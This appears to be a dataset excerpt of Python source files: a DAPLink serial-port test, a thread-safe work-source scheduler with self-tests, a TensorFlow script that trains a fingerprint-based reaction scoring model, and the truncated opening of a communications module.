source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
test_serial.py
|
#
# DAPLink Interface Firmware
# Copyright (c) 2009-2016, ARM Limited, All Rights Reserved
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from __future__ import division
import queue
import functools
import serial
import threading
import time
ERROR_TIMEOUT_SECONDS = 10.0
def _same(d1, d2):
#Do a string or bytearray compare
if d1 != d2:
return False
return True
# http://digital.ni.com/public.nsf/allkb/D37754FFA24F7C3F86256706005B9BE7
standard_test_baud_rates = [
9600,
14400,
19200,
28800,
38400,
#56000, #TODO - uncomment once daplink-validation supports 56000 on nrf5x
57600,
115200,
]
standard_timing_baud_rates = standard_test_baud_rates[3:]
quick_test_baud_rates = [9600, 115200]
quick_timing_baud_rates = [115200]
def calc_timeout(length, baud):
"""Calculate a timeout given the data and baudrate
Positional arguments:
length - size of data to be sent
baud - baud rate to send data
Calculate a reasonable timeout given the supplied parameters.
This function adds slightly more time then is needed, to accont
for latency and various configurations.
"""
return 12 * float(length) / float(baud) + 0.2
class SerialTester(object):
"""Helper object to buffer serial and setup baud"""
def __init__(self, port):
self.raw_serial = serial.Serial(port=port, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=None, xonxoff=False, rtscts=False, write_timeout=None, dsrdtr=False, inter_byte_timeout=None, exclusive=None)
self.raw_serial.write_timeout = ERROR_TIMEOUT_SECONDS
self._queue = queue.Queue()
self._write_thread = threading.Thread(target=self._serial_main)
self._write_thread.start()
def __enter__(self):
return self
def __exit__(self, exception_type, value, traceback):
self._queue.put(None)
self._write_thread.join(ERROR_TIMEOUT_SECONDS)
assert not self._write_thread.is_alive(), "Thread join failed"
self.raw_serial.close()
self.raw_serial = None
return False
def new_session_with_baud(self, baud, parent_test):
"""Start a new session by restarting target and setting baud"""
test_info = parent_test.create_subtest("Set Baud")
# Set baud to 115200
self.raw_serial.baudrate = 115200
self.raw_serial.timeout = 1.0
# Reset the target
self.raw_serial.sendBreak()
self.raw_serial.reset_output_buffer()
self.raw_serial.reset_input_buffer()
# Wait until the target is initialized
expected_resp = "{init}"
resp = self.read(len(expected_resp))
if not _same(resp.decode(), expected_resp):
test_info.failure("Fail on init: %s" % resp)
return False
# Change baudrate to that of the first test
command = "{baud:%i}" % baud
self.write(command.encode())
resp = self.read(len(command))
if not _same(resp.decode(), command):
test_info.failure("Fail on baud command: %s" % resp)
return False
# Update baud of local serial port
self.raw_serial.baudrate = baud
# Read the response indicating that the baudrate
# on the target has changed
expected_resp = "{change}"
resp = self.read(len(expected_resp))
if not _same(resp.decode(), expected_resp):
test_info.failure("Fail on baud change %s" % resp)
return False
# Set default timeout
self.raw_serial.timeout = ERROR_TIMEOUT_SECONDS
# Success
return True
def read(self, length):
"""Read serial data"""
return self.raw_serial.read(length)
def write(self, data):
"""Write serial port data in the background"""
func = functools.partial(self.raw_serial.write, data)
self._queue.put(func)
def set_read_timeout(self, timeout):
"""Set timeout for read operations"""
assert self._queue.empty(), "Queue must be empty to change timeout"
self.raw_serial.timeout = timeout
def flush(self):
"""Wait for all writes to complete"""
self._queue.join()
assert self._queue.empty()
def _serial_main(self):
"""Write helper thread"""
while True:
task = self._queue.get(True)
if task is None:
self._queue.task_done()
# End of processing is an empty task
break
try:
task()
except serial.SerialTimeoutException:
pass
self._queue.task_done()
def test_serial(workspace, parent_test, quick=False):
"""Test the serial port endpoint
Requirements:
-daplink-validation must be loaded for the target.
Positional arguments:
port - the serial port to open as a string
Return:
True if the test passed, False otherwise
"""
test_info = parent_test.create_subtest("Serial test")
board = workspace.board
port = board.get_serial_port()
test_info.info("Testing serial port %s" % port)
# Note: OSX sends a break command when a serial port is closed.
# To avoid problems while testing keep the serial port open the
# whole time. Use the property 'baudrate' to change the baud
# instead of opening a new instance.
test_baud_rates = quick_test_baud_rates if quick else standard_test_baud_rates
timing_baud_rates = quick_timing_baud_rates if quick else standard_timing_baud_rates
with SerialTester(port) as sp:
# Generate a 4KB block of dummy data
# and test supported baud rates
test_data = [i for i in range(0, 256)] * 4 * 4
test_data = bytearray(test_data)
for baud in test_baud_rates:
test_info.info("Testing baud %i" % baud)
success = sp.new_session_with_baud(baud, test_info)
if not success:
test_info.failure("Unable to setup session")
continue
# Perform test
sp.write(test_data)
resp = sp.read(len(test_data))
if _same(test_data, resp):
test_info.info("Pass")
else:
test_info.failure("Fail on baud %s" % baud)
# Timing stress test - send data at critical points
# in time like right as the transmitter is turned off
# ------------------
# Test sequence
# 1. Send a block of data (vary size for the test)
# 2. Wait until 1 byte is read back
# 3. Write 1 byte
# 4. Read back all data
test_data = [i for i in range(0, 256)] * 4 * 4
test_data = bytearray(test_data)
for baud in timing_baud_rates:
test_info.info("Timing test baud %i" % baud)
success = sp.new_session_with_baud(baud, test_info)
if not success:
test_info.failure("Unable to setup session")
continue
test_pass = True
for data_size in range(1, 10):
data = test_data[0:data_size + 1]
for _ in range(0, 1000):
resp = bytearray()
sp.write(data[0:data_size])
resp += sp.read(1)
sp.write(data[-1:])
resp += sp.read(data_size)
sp.flush()
if not _same(data, resp):
test_pass = False
test_info.info("fail size - %s" % data_size)
break
# Break if already failed
if not test_pass:
break
if test_pass:
test_info.info("Pass")
else:
test_info.failure("Fail on timing test with baud %s"
% baud)
# Setting change smoke test - reconfigure settings while
# in the middle of a transfer and verify nothing bad
test_data = [i for i in range(0, 128)]
test_data = bytearray(test_data)
sp.new_session_with_baud(115200, test_info)
sp.set_read_timeout(0)
for baud in test_baud_rates:
sp.raw_serial.baudrate = baud
sp.write(test_data)
xfer_time = float(len(test_data) * 10) / float(baud)
time.sleep(xfer_time / 2)
# Discard data
sp.read(1024)
# Read any leftover data
sp.flush()
sp.raw_serial.baudrate = 115200
sp.set_read_timeout(1.0)
sp.read(128 * len(test_baud_rates))
# Generate a 8 KB block of dummy data
# and test a large block transfer
test_data = [i for i in range(0, 256)] * 4 * 8
test_data = bytearray(test_data)
sp.new_session_with_baud(115200, test_info)
sp.write(test_data)
resp = sp.read(len(test_data))
if _same(resp, test_data):
test_info.info("Block test passed")
else:
test_info.failure("Block test failed")
# Refresh to check for asserts
board.refresh(test_info)
|
work_sources.py
|
#!/usr/bin/env python3
#-*- coding: iso-8859-1 -*-
################################################################################
#
# This module implements an interlocked thread-safe structure for tracking
# incoming work from multiple sources and allocating processing of the work.
#
# wss = WorkSources(number_of_sources, idle_timeout)
#
# Specifically, producer threads can indicate presence of work at Nth source
# by calling
#
# wss.add_work(N)
#
# and consumer thread (which must be heavy) can poll for the presence of work
# at any source by calling
#
# (stopped, N) = wss.begin_work([timeout])
# ...use Nth source...
# wss.end_work(N)
#
# and the source cannot be emitted from begin_work again, until the client
# indicates end of processing by calling end_work.
#
# Two additional notes:
# 1. begin_work detects stopping of the calling thread and exits with boolean flag.
# 2. if any source didn't have any work for idle_timeout, it is nevertheless
# returned from begin_work, presumably so that the caller can check the source
# manually.
#
# This module is written specifically to suit protocol_retry.py's needs,
# therefore it is hardly useful anywhere else.
#
# Pythomnic3k project
# (c) 2005-2014, Dmitry Dvoinikov <dmitry@targeted.org>
# Distributed under BSD license
#
################################################################################
__all__ = [ "WorkSources" ]
################################################################################
import threading; from threading import Lock, Event, current_thread
if __name__ == "__main__": # add pythomnic/lib to sys.path
import os; import sys
main_module_dir = os.path.dirname(sys.modules["__main__"].__file__) or os.getcwd()
sys.path.insert(0, os.path.normpath(os.path.join(main_module_dir, "..")))
import typecheck; from typecheck import typecheck, optional
import pmnc.timeout; from pmnc.timeout import Timeout
################################################################################
class _WorkSource:
@typecheck
def __init__(self, idle_timeout: float):
self._idle_timeout = Timeout(idle_timeout)
self._has_work = False
self._working = False
def add_work(self):
self._has_work = True
def begin_work(self):
if not self._working and (self._has_work or self._idle_timeout.expired):
self._has_work = False
self._working = True
return True
else:
return False
def end_work(self):
assert self._working
self._working = False
self._idle_timeout.reset()
################################################################################
class WorkSources:
@typecheck
def __init__(self, size: int, idle_timeout: float):
self._lock = Lock()
self._signal = Event()
self._idle_timeout = idle_timeout
self._sources = tuple(_WorkSource(idle_timeout) for i in range(size))
@typecheck
def add_work(self, i: int):
with self._lock:
self._sources[i].add_work()
self._signal.set()
@typecheck
def begin_work(self, timeout: optional(float) = None) -> (bool, optional(int)):
timeout = Timeout(timeout or self._idle_timeout + 1.0)
while not timeout.expired:
if current_thread().stopped():
return True, None
self._signal.wait(min(timeout.remain, 3.0)) # this may spend waiting slightly less, but it's ok
with self._lock:
for i, source in enumerate(self._sources):
if source.begin_work():
return False, i
else:
self._signal.clear()
else:
return False, None
@typecheck
def end_work(self, i: int):
with self._lock:
self._sources[i].end_work()
self._signal.set()
################################################################################
if __name__ == "__main__":
print("self-testing module work_sources.py:")
###################################
from time import sleep
from expected import expected
from pmnc.threads import HeavyThread
###################################
def test_WorkSource_idle():
ws = _WorkSource(2.0)
assert not ws.begin_work()
sleep(1.2)
assert not ws.begin_work()
sleep(1.2)
assert ws.begin_work()
test_WorkSource_idle()
###################################
def test_WorkSource_working():
ws = _WorkSource(2.0)
assert not ws.begin_work()
ws.add_work()
assert ws.begin_work()
assert not ws.begin_work()
sleep(2.4) # cannot go idle while working
assert not ws.begin_work()
ws.end_work()
assert not ws.begin_work()
test_WorkSource_working()
###################################
def test_WorkSource_add_work():
ws = _WorkSource(2.0)
assert not ws.begin_work()
ws.add_work() # multiple calls to add_work count as one
ws.add_work()
ws.add_work()
assert ws.begin_work()
assert not ws.begin_work() # working
ws.end_work()
assert not ws.begin_work() # all work has been accounted for
ws.add_work()
assert ws.begin_work()
ws.add_work() # add_work while working will count later
ws.end_work()
assert ws.begin_work()
test_WorkSource_add_work()
###################################
def test_WorkSource_end_work():
ws = _WorkSource(2.0)
with expected(AssertionError):
ws.end_work()
ws.add_work()
with expected(AssertionError):
ws.end_work()
assert ws.begin_work()
ws.end_work()
with expected(AssertionError):
ws.end_work()
test_WorkSource_end_work()
###################################
def test_WorkSources_idle():
current_thread().stopped = lambda: False
wss = WorkSources(2, 2.0)
assert wss.begin_work(1.2) == (False, None)
assert wss.begin_work(1.2) == (False, 0)
assert wss.begin_work(0.0) == (False, 1)
assert wss.begin_work(0.0) == (False, None)
assert wss.begin_work() == (False, None)
test_WorkSources_idle()
###################################
def test_WorkSources_add_work():
current_thread().stopped = lambda: False
wss = WorkSources(2, 2.0)
wss.add_work(0)
assert wss.begin_work(0.0) == (False, 0)
assert wss.begin_work(1.2) == (False, None)
assert wss.begin_work(1.2) == (False, 1)
assert wss.begin_work(1.2) == (False, None)
assert wss.begin_work(1.2) == (False, None)
wss.add_work(0)
wss.end_work(1)
assert wss.begin_work(1.2) == (False, None)
assert wss.begin_work(1.2) == (False, 1)
wss.add_work(1)
wss.end_work(1)
assert wss.begin_work(0.0) == (False, 1)
assert wss.begin_work(1.2) == (False, None)
wss.end_work(0)
assert wss.begin_work(0.0) == (False, 0)
assert wss.begin_work(1.2) == (False, None)
test_WorkSources_add_work()
###################################
def test_WorkSources_stop_thread():
th_started = Event()
def th_proc():
wss = WorkSources(1, 30.0)
th_started.set()
assert wss.begin_work(10.0) == (True, None)
th = HeavyThread(target = th_proc)
th.start()
t = Timeout(30.0)
th_started.wait()
sleep(1.0)
th.stop()
assert t.remain > 25.0
test_WorkSources_stop_thread()
###################################
def test_WorkSources_timeout():
current_thread().stopped = lambda: False
wss = WorkSources(1, 30.0)
t = Timeout(10.0)
assert wss.begin_work(3.0) == (False, None)
assert abs(t.remain - 7.0) < 1.0
test_WorkSources_timeout()
###################################
def test_WorkSources_signal_kept():
current_thread().stopped = lambda: False
wss = WorkSources(4, 30.0)
wss.add_work(0)
wss.add_work(1)
wss.add_work(2)
wss.add_work(3)
t = Timeout(10.0)
assert wss.begin_work(1.0) == (False, 0)
assert wss.begin_work(1.0) == (False, 1)
assert wss.begin_work(1.0) == (False, 2)
assert wss.begin_work(1.0) == (False, 3)
assert t.remain > 9.0
assert wss.begin_work(3.0) == (False, None)
assert t.remain < 8.0
test_WorkSources_signal_kept()
###################################
def test_WorkSources_signal_kick():
th_started = Event()
th_got_work = Event()
wss = WorkSources(1, 30.0)
def th_proc():
th_started.set()
assert wss.begin_work(10.0) == (False, 0)
th_got_work.set()
th = HeavyThread(target = th_proc)
th.start()
th_started.wait()
t = Timeout(30.0)
wss.add_work(0)
th_got_work.wait()
assert t.remain > 29.0
th.stop()
test_WorkSources_signal_kick()
###################################
def test_WorkSources_end_work():
current_thread().stopped = lambda: False
wss = WorkSources(2, 30.0)
wss.add_work(1)
assert wss.begin_work(0.0) == (False, 1)
wss.add_work(0)
assert wss.begin_work(0.0) == (False, 0)
assert wss.begin_work(0.0) == (False, None)
wss.add_work(1)
assert wss.begin_work(0.0) == (False, None)
th_started = Event()
th_got_work = Event()
def th_proc():
th_started.set()
assert wss.begin_work(10.0) == (False, 1)
th_got_work.set()
th = HeavyThread(target = th_proc)
th.start()
th_started.wait()
t = Timeout(30.0)
wss.end_work(1)
th_got_work.wait()
assert t.remain > 29.0, t.remain
th.stop()
test_WorkSources_end_work()
###################################
print("ok")
################################################################################
# EOF
|
nntrain_fingerprint.py
|
import tensorflow as tf
from utils.nn import linearND
import math, sys, random, os
from optparse import OptionParser
import threading
from multiprocessing import Queue, Process
import numpy as np
from Queue import Empty
import time
import h5py
from itertools import chain
import os
project_root = os.path.dirname(os.path.dirname(__file__))
NK = 10
NK0 = 5
report_interval = 1
max_save = 30
min_iterations = 1000
score_scale = 5.0
min_separation = 0.25
FP_len = 1024
FP_rad = 2
parser = OptionParser()
parser.add_option("-t", "--train", dest="train_path", default=os.path.join(project_root, 'data', 'reaxys_limit10.txt'))
parser.add_option("--h5", dest="h5_suffix", default=".h5")
parser.add_option("-m", "--save_dir", dest="save_path", default=os.path.join(project_root, 'models', 'example_model'))
parser.add_option("-b", "--batch", dest="batch_size", default=16384)
parser.add_option("-w", "--hidden", dest="hidden_size", default=300)
parser.add_option("-d", "--depth", dest="depth", default=5)
parser.add_option("-l", "--max_norm", dest="max_norm", default=5.0)
parser.add_option("-u", "--device", dest="device", default="")
parser.add_option("--test", dest="test", default='')
parser.add_option("-v", "--verbose", dest="verbose_test", default=False)
parser.add_option("-c", "--checkpoint", dest="checkpoint", default="final")
parser.add_option("-s", "--saveint", dest="save_interval", default=0)
parser.add_option("-i", "--interactive", dest="interactive", default=False)
opts,args = parser.parse_args()
batch_size = int(opts.batch_size)
hidden_size = int(opts.hidden_size)
depth = int(opts.depth)
max_norm = float(opts.max_norm)
test = opts.test
save_interval = int(opts.save_interval)
verbose_test = bool(opts.verbose_test)
interactive_mode = bool(opts.interactive)
h5_suffix = opts.h5_suffix
if '2048' in h5_suffix:
FP_len = 2048
if interactive_mode:
batch_size = 2 # keep it small
if not os.path.isdir(opts.save_path):
os.mkdir(opts.save_path)
import rdkit.Chem.AllChem as AllChem
if 'counts' not in opts.save_path and 'uint8' not in opts.h5_suffix:
# bool version
def mol_to_fp(mol, radius=FP_rad, nBits=FP_len):
if mol is None:
return np.zeros((nBits,), dtype=np.float32)
return np.array(AllChem.GetMorganFingerprintAsBitVect(mol, radius, nBits=nBits,
useChirality=True), dtype=np.bool)
else:
# uint8 version
def mol_to_fp(mol, radius=FP_rad, nBits=FP_len, convFunc=np.array):
if mol is None:
return convFunc((nBits,), dtype=dtype)
fp = AllChem.GetMorganFingerprint(mol, radius, useChirality=True) # uitnsparsevect
fp_folded = np.zeros((nBits,), dtype=dtype)
for k, v in fp.GetNonzeroElements().iteritems():
fp_folded[k % nBits] += v
return convFunc(fp_folded)
def smi_to_fp(smi, radius=FP_rad, nBits=FP_len):
if not smi:
return np.zeros((nBits,), dtype=np.float32)
return mol_to_fp(Chem.MolFromSmiles(smi), radius, nBits)
gpu_options = tf.GPUOptions(allow_growth=True, visible_device_list=opts.device)
with tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)) as session:
_input_mol = tf.placeholder(tf.float32, [batch_size*2, FP_len])
sa_target = tf.placeholder(tf.float32, [batch_size*2,])
q = tf.FIFOQueue(20, [tf.float32], shapes=[[batch_size*2, FP_len]]) # fixed size
enqueue = q.enqueue(_input_mol)
input_mol = q.dequeue()
src_holder = [input_mol]
input_mol.set_shape([batch_size*2, FP_len])
mol_hiddens = tf.nn.relu(linearND(input_mol, hidden_size, scope="encoder0"))
for d in xrange(1, depth):
mol_hiddens = tf.nn.relu(linearND(mol_hiddens, hidden_size, scope="encoder%i"%d))
score_sum = linearND(mol_hiddens, 1, scope="score_sum")
score_sum = tf.squeeze(score_sum)
score = 1.0 + (score_scale - 1.0) * tf.nn.sigmoid(score_sum)
# For evaluation only - get SSE against a target
sse = tf.reduce_sum(tf.square(score - sa_target))
pm_one = tf.constant([-1, 1], dtype=tf.float32)
reshape_score = tf.reshape(score, [batch_size, 2])
reshape_score = tf.multiply(reshape_score, pm_one) # products minus reactants
diff_score = tf.reduce_sum(reshape_score, axis=-1)
# shifted ReLU loss (like hinge loss)
# want to have positive diff score - min_separation > 0
loss = tf.nn.relu(min_separation - diff_score)
loss = tf.reduce_sum(loss)
# For normal reaction-wise training
_lr = tf.placeholder(tf.float32, [])
optimizer = tf.train.AdamOptimizer(learning_rate=_lr)
param_norm = tf.global_norm(tf.trainable_variables())
grads_and_vars = optimizer.compute_gradients(loss / batch_size)
grads, var = zip(*grads_and_vars)
grad_norm = tf.global_norm(grads)
new_grads, _ = tf.clip_by_global_norm(grads, max_norm)
grads_and_vars = zip(new_grads, var)
backprop = optimizer.apply_gradients(grads_and_vars)
# For training if exact values known (unused)
sse_grads_and_vars = optimizer.compute_gradients(sse / batch_size / 2.0)
sse_grads, sse_var = zip(*sse_grads_and_vars)
sse_grad_norm = tf.global_norm(sse_grads)
sse_new_grads, _ = tf.clip_by_global_norm(sse_grads, max_norm)
sse_grads_and_vars = zip(sse_new_grads, sse_var)
sse_backprop = optimizer.apply_gradients(sse_grads_and_vars)
tf.global_variables_initializer().run(session=session)
size_func = lambda v: reduce(lambda x, y: x*y, v.get_shape().as_list())
n = sum(size_func(v) for v in tf.trainable_variables())
print "Model size: %dK" % (n/1000,)
queue = Queue()
def read_data_once(path, coord, frag='valid'):
if os.path.isfile(path + '.pkl'):
with open(path + '.pkl', 'r') as fid:
data = pickle.load(fid)
else:
data = []
with open(path, 'r') as f:
for line in f:
rex, n, _id = line.strip("\r\n").split(' ')
r,p = rex.split('>>')
if ('.' in p) or (not p):
continue # do not allow multiple products or none
n = int(n)
for r_splt in r.split('.'):
if r_splt:
data.append((_id, n, r_splt, p))
random.seed(123)
random.shuffle(data)
with open(path + '.pkl', 'w') as fid:
data = pickle.dump(data, fid, -1)
# h5py was generated post-shuffle
f = h5py.File(path + h5_suffix, 'r')
data_fps = f['data_fps']
data_len = len(data)
print('After splitting, %i total data entries' % data_len)
if frag == 'train':
data = data[:int(0.8 * data_len)]
h5_offset = 0*2
data_len = len(data)
print('Taking pseudo-random 0.8 as training set (%i)' % data_len)
elif frag == 'valid':
data = data[int(0.8 * data_len):int(0.9 * data_len)]
h5_offset = int(0.8 * data_len)*2
data_len = len(data)
print('Taking pseudo-random 0.1 as validation set (%i)' % data_len)
elif frag == 'test':
data = data[int(0.9 * data_len):]
h5_offset = int(0.9 * data_len)*2
data_len = len(data)
print('Taking pseudo-random 0.1 as test set (%i)' % data_len)
else:
raise ValueError('Unknown data frag type')
print('h5 offset: {}'.format(h5_offset))
it = 0
src_mols = np.zeros((batch_size*2, FP_len), dtype=np.float32)
while it < data_len:
# Try to get all FPs in one read (faster)
if (it + batch_size) <= data_len:
src_batch = list(chain.from_iterable((data[i][2], data[i][3]) for i in xrange(it, it + batch_size)))
ids_batch = [data[i][0] for i in xrange(it, it + batch_size)]
src_mols[:, :] = data_fps[h5_offset+2*it:h5_offset+2*(it+batch_size), :]
it = it + batch_size
# If we are at the end, do one-by-one)
else:
src_batch = []
ids_batch = []
for i in xrange(batch_size):
if it >= data_len:
src_batch.append(r)
src_batch.append(p)
ids_batch.append(_id)
src_mols[2*i:2*i+2, :] = np.zeros((2, FP_len))
else:
_id, n, r, p = data[it]
src_batch.append(r)
src_batch.append(p)
ids_batch.append(_id)
src_mols[2*i:2*i+2, :] = data_fps[h5_offset+2*it:h5_offset+2*it+2, :]
it = it + 1
session.run(enqueue, feed_dict={_input_mol: src_mols})
queue.put((ids_batch, src_batch))
# Stop signal for testing
queue.put((None, None))
coord.request_stop()
def read_data_master(path, coord):
if not os.path.isfile(path + h5_suffix):
quit('Need to run .h5 script first to get FPs')
if os.path.isfile(path + '.pkl'):
with open(path + '.pkl', 'r') as fid:
data = pickle.load(fid)
else:
data = []
with open(path, 'r') as f:
for line in f:
rex, n, _id = line.strip("\r\n").split(' ')
r,p = rex.split('>>')
if ('.' in p) or (not p):
continue # do not allow multiple products or none
n = int(n)
for r_splt in r.split('.'):
if r_splt:
data.append((_id, n, r_splt, p))
random.seed(123)
random.shuffle(data)
with open(path + '.pkl', 'w') as fid:
data = pickle.dump(data, fid, -1)
# h5py is post-shuffle
f = h5py.File(path + h5_suffix, 'r')
data_fps = f['data_fps']
data_len = len(data)
print('After splitting, %i total data entries' % data_len)
print('...slicing data')
data = data[:int(0.8 * data_len)]
print('...NOT slicing h5 FP dataset, but defining offset (= 0)')
h5_offset = 0
data_len = len(data)
print('Taking pseudo-random 0.8 for training (%i)' % data_len)
it = 0;
src_mols = np.zeros((batch_size*2, FP_len), dtype=np.float32)
while not coord.should_stop():
# Try to get all FPs in one read (faster)
if (it + batch_size) <= data_len:
src_batch = list(chain.from_iterable((data[i][2], data[i][3]) for i in xrange(it, it + batch_size)))
ids_batch = [data[i][0] for i in xrange(it, it + batch_size)]
src_mols[:, :] = data_fps[h5_offset+2*it:h5_offset+2*(it+batch_size), :]
it = (it + batch_size) % data_len
# If we are at the end (where we need to loop around, do one-by-one)
else:
src_batch = []
ids_batch = []
for i in xrange(batch_size):
_id, n, r, p = data[it]
src_batch.append(r)
src_batch.append(p)
ids_batch.append(_id)
src_mols[2*i:2*i+2, :] = data_fps[h5_offset+2*it:h5_offset+2*it+2, :]
it = (it + 1) % data_len
session.run(enqueue, feed_dict={_input_mol: src_mols})
queue.put((ids_batch, src_batch))
print('Queue size: {}'.format(queue.qsize()))
sys.stdout.flush()
coord.request_stop()
f.close()
def dummy_thread():
return
coord = tf.train.Coordinator()
if interactive_mode:
all_threads = [threading.Thread(target=dummy_thread)]
elif test:
all_threads = [threading.Thread(target=read_data_once, args=(opts.train_path, coord), kwargs={'frag': opts.test})]
else:
all_threads = [threading.Thread(target=read_data_master, args=(opts.train_path, coord))]
print('Added read_data_master')
[t.start() for t in all_threads]
if not interactive_mode:
data_len = 0
with open(opts.train_path, 'r') as f:
for line in f:
data_len += 1
print('Data length: %i' % data_len)
if save_interval == 0: # approx once per epoch
save_interval = np.ceil(data_len / float(batch_size))
saver = tf.train.Saver(max_to_keep=None)
if test or interactive_mode:
if opts.checkpoint:
restore_path = os.path.join(opts.save_path, 'model.%s' % opts.checkpoint)
else:
restore_path = tf.train.latest_checkpoint(opts.save_path)
saver.restore(session, restore_path)
print('Restored values from latest saved file ({})'.format(restore_path))
test_path = '%s.prediced.%s.%s' % (restore_path, os.path.basename(opts.train_path), str(opts.test))
summary_path = os.path.join(opts.save_path, 'model.%s.summary' % os.path.basename(opts.train_path))
it, sum_diff, sum_gnorm, sum_diff_is_pos = 0, 0.0, 0.0, 0.0
sum_loss = 0.0; sum_diff_is_big = 0.0
lr = 0.001
try:
if interactive_mode:
prompt = raw_input('enter a tag for this session: ')
interactive_path = '%s.interactive.%s' % (restore_path, prompt.strip())
fid = open(interactive_path, 'a')
def get_score_from_smi(smi):
if not smi:
return ('', 0.)
src_batch = [smi]
while len(src_batch) != (batch_size * 2): # round out last batch
src_batch.append('')
src_mols = np.array(map(smi_to_fp, src_batch), dtype=np.float32)
if sum(sum(src_mols)) == 0:
print('Could not get fingerprint?')
cur_score = [0.]
else:
# Run
cur_score, = session.run([score], feed_dict={
input_mol: src_mols,
_lr: 0.001,
})
print('Score: {}'.format(cur_score[0]))
mol = Chem.MolFromSmiles(smi)
if mol:
smi = Chem.MolToSmiles(mol, isomericSmiles=True, kekuleSmiles=True)
else:
smi = ''
return (smi, cur_score[0])
while True:
try:
prompt = raw_input('\nEnter SMILES (or quit): ')
if prompt.strip() == 'quit':
break
if str('>') in prompt: # reaction
reactants = prompt.strip().split('>')[0].split('.')
reactants_smi = []
reactants_score = 0.
for reactant in reactants:
(smi, cur_score) = get_score_from_smi(reactant)
reactants_smi.append(smi)
reactants_score = max(reactants_score, cur_score)
products = prompt.strip().split('>')[2].split('.')
products_smi = []
products_score = 0.
for product in products:
(smi, cur_score) = get_score_from_smi(product)
products_smi.append(smi)
products_score = max(products_score, cur_score)
smi = '{}>>{}'.format('.'.join(reactants_smi), '.'.join(products_smi))
fid.write('%s %s %.4f %.4f %.4f\n' % (prompt.strip(), smi, reactants_score, products_score, products_score-reactants_score))
else: # single or list of mols
reactants = prompt.strip().split('.')
reactants_smi = []
reactants_score = 0.
for reactant in reactants:
(smi, cur_score) = get_score_from_smi(reactant)
reactants_smi.append(smi)
reactants_score = max(reactants_score, cur_score)
fid.write('%s %s %.4f\n' % (prompt.strip(), '.'.join(reactants_smi), reactants_score))
except KeyboardInterrupt:
print('Breaking out of prompt')
fid.close()
raise KeyboardInterrupt
except Exception as e:
print(e)
fid.write('%s\n' % prompt.strip())
continue
elif test:
while queue.qsize() == 0:
print('Letting queue fill up (5 s...)')
time.sleep(5)
summarystring = ''
ctr = 0.0
if verbose_test:
learned_scores = []
sum_diff_is_pos = 0.0
sum_diff_is_big = 0.0
sum_diff = 0.0
sum_gnorm = 0.0
sum_loss = 0.0
while True:
try:
(ids_batch, src_batch) = queue.get(timeout=120)
if src_batch is None:
raise Empty
cur_diff, cur_score, cur_loss = session.run([diff_score, score, loss])
it += 1
for _id in ids_batch:
if _id > 0:
ctr += 1
sum_diff_is_pos += np.sum(cur_diff > 0)
sum_diff_is_big += np.sum(cur_diff > min_separation)
sum_diff += np.sum(cur_diff)
sum_loss += cur_loss
if verbose_test:
for i in range(len(ids_batch)):
learned_scores.append(cur_score[2*i])
learned_scores.append(cur_score[i*2+1])
if it % report_interval == 0:
summarystring = "for %6i pairs, DiffIsPos: %.4f, DiffIs%.2f: %.4f, Loss: %.4f" % \
(ctr, sum_diff_is_pos / ctr, min_separation,
sum_diff_is_big / ctr, sum_loss / ctr)
print(summarystring)
sys.stdout.flush()
except Empty:
print('End of data queue I think...have seen {} examples'.format(ctr))
break
summarystring = "for %6i pairs, DiffIsPos: %.4f, DiffIs%.2f: %.4f, Loss: %.4f" % \
(ctr, sum_diff_is_pos / ctr, min_separation,
sum_diff_is_big / ctr, sum_loss / ctr)
print(summarystring)
sys.stdout.flush()
fidsum = open(summary_path, 'a')
fidsum.write('[%s-%s] %s\n' % (opts.checkpoint, opts.test, summarystring))
fidsum.close()
if verbose_test:
fid = h5py.File(test_path + '.h5', 'w')
dset = fid.create_dataset('learned_scores', (len(learned_scores),), dtype=np.float32)
dset[:] = np.array(learned_scores)
fid.close()
else:
hist_fid = open(opts.save_path + "/model.hist", "a")
print('Letting queue fill up (10 s)')
time.sleep(10)
while not coord.should_stop():
it += 1
_, cur_diff, cur_score, pnorm, gnorm, cur_loss = session.run([backprop, diff_score, score, param_norm, grad_norm, loss], feed_dict={_lr:lr})
(ids_batch, src_batch) = queue.get()
sum_diff_is_pos += np.sum(cur_diff > 0)
sum_diff_is_big += np.sum(cur_diff > min_separation)
sum_diff += np.sum(cur_diff)
sum_gnorm += gnorm
sum_loss += cur_loss
if it % min(report_interval, save_interval) == 0:
logstr = "it %06i [%09i pairs seen], AvgDiff: %.2f, FracDiffPos: %.3f, FracDiff%.2f: %.3f, PNorm: %.2f, GNorm: %.2f, Loss: %.4f" % \
(it, it*batch_size*2, sum_diff / (report_interval * batch_size),
sum_diff_is_pos / (report_interval * batch_size),
min_separation, sum_diff_is_big / (report_interval * batch_size),
pnorm, sum_gnorm / report_interval,
sum_loss / report_interval)
hist_fid.write(logstr + "\n")
print(logstr)
sys.stdout.flush()
sum_diff, sum_gnorm, sum_perfrank = 0.0, 0.0, 0.0
sum_loss, sum_diff_is_pos, sum_diff_is_big = 0.0, 0.0, 0.0
print('Ex: {:.2f}>>{:.2f} -> diff = {:.2f}'.format(
cur_score[0], cur_score[1], cur_diff[0]))
print('Ex: ID{} === {}>>{}'.format(
ids_batch[0], src_batch[0], src_batch[1]))
sys.stdout.flush()
if it % save_interval == 0:
lr *= 0.9
saver.save(session, opts.save_path + "/model.ckpt", global_step=it)
print "Model Saved! Decaying learning rate"
if it >= max(min_iterations, max_save * save_interval):
coord.request_stop()
except Exception as e:
print e
coord.request_stop(e)
finally:
if not test and not interactive_mode:
saver.save(session, opts.save_path + "/model.final")
hist_fid.close()
coord.request_stop()
coord.join(all_threads)
try:
[p.join() for p in processes]
except Exception:
pass
|
communications.py
|
"""communications: communications classes and programs for librarian
In addition to defining various communication classes, some functions are
intended to be run as in separate standalone programs, with an appropriate
"__main__" clause. See CLI_chat.py as an example.
Copyright (c) 2018 by Jeff Bass.
License: MIT, see LICENSE for more details.
"""
import csv
import sys
import pprint
import logging
import threading
from time import sleep
from pathlib import Path
from collections import namedtuple
